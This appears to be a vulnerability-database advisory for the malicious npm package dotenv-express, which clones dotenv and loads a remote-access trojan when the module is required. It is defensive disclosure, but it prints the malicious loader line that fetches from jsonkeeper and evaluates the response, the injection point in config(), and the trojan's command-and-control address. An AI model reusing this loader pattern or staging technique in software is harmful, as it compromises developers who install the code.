VDB

GCVE-110-OSM-2026-6450

GCVE-110-OSM-2026-6450
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 21, 2026
Executes remote code at require-time via a coordinated staging attack: dotenv-express@17.4.6 clones the real motdotla/dotenv source and injects require('environment-gate') into config() which fires immediately via a config.js IIFE on module load; the environment-gate dep (published 49 minutes before injection by the same actor jeandupontmail24@gmail.com) fetches https://www.jsonkeeper.com/b/VKUNI and evaluates the response via eval(r.data.content) to deploy a socket.io RAT connecting to http://216.126.224.247/api/service/329f753d052f978a486cdce9896050bb with child_process and execSync capabilities. dotenv-express@17.4.6 impersonates motdotla/dotenv by cloning its real source (git_head af05aa05) and spoofing the GitHub repo URL. lib/main.js line 5 adds const gate = require('environment-gate') and calls gate() at the top of config() before any legitimate dotenv logic. config.js wraps the entire module in an IIFE that immediately invokes config(), so gate() fires at require-time with no user interaction. environment-gate (also published by jeandupontmail24@gmail.com on 2026-06-13 and injected as a prod dep 49 minutes later) performs: axios.get('https://www.jsonkeeper.com/b/VKUNI').then(r => eval(r.data.content)). The resolved stage-2 payload (sha256: aef5f812d2815f345f6a7041246587f014dad4c90a0814334b074e1dbcd7071e, decoded via obfuscator-io-rotation-rc4) deploys a socket.io RAT connecting to http://216.126.224.247/api/service/329f753d052f978a486cdce9896050bb with child_process, execSync, and spawn capabilities.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowndotenv-expressall versions (affected)

References

vendor

Browse GCVE Records

73,738 records in the GCVE database · Updated July 19, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›